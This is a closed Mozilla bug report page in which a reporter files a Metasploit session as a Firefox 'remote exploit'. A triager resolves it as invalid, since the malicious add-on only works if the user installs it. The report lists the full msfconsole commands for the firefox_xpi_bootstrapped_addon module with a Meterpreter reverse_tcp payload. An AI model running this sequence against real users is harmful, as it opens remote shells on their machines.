Closed Bug 788033 Opened 13 years ago Closed 13 years ago

Firefox Addon Bootstrap Exploit

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
15 Branch
Platform:
x86_64
Windows 7
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: skiller.rs1, Unassigned)

Details

Attachments

(1 file)

a.png
103.12 KB, image/png
Details
Attached image a.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 Build ID: 20120824154833 Steps to reproduce: Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox. Code: msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf>set payload windows/meterpreter/reverse_tcp msf>set lport 81 msf> set lhost 0.0.0.0 msf> set srvhost yourip msf> show targets Id Name -- ---- 0 Generic (Java Payload) 1 Windows x86 (Native Payload) 2 Linux x86 (Native Payload) 3 Mac OS X PPC (Native Payload) 4 Mac OS X x86 (Native Payload) msf> set target 1 msf > exploit Actual results: I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions. Expected results: The exploit shouldn't have existed in the first place.
this is not security sensitive this is a module that creates a malicious xpi that is an attempt to get the user to install a crafted add-on since add-ons can have chrome privileges they can do just about anything
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: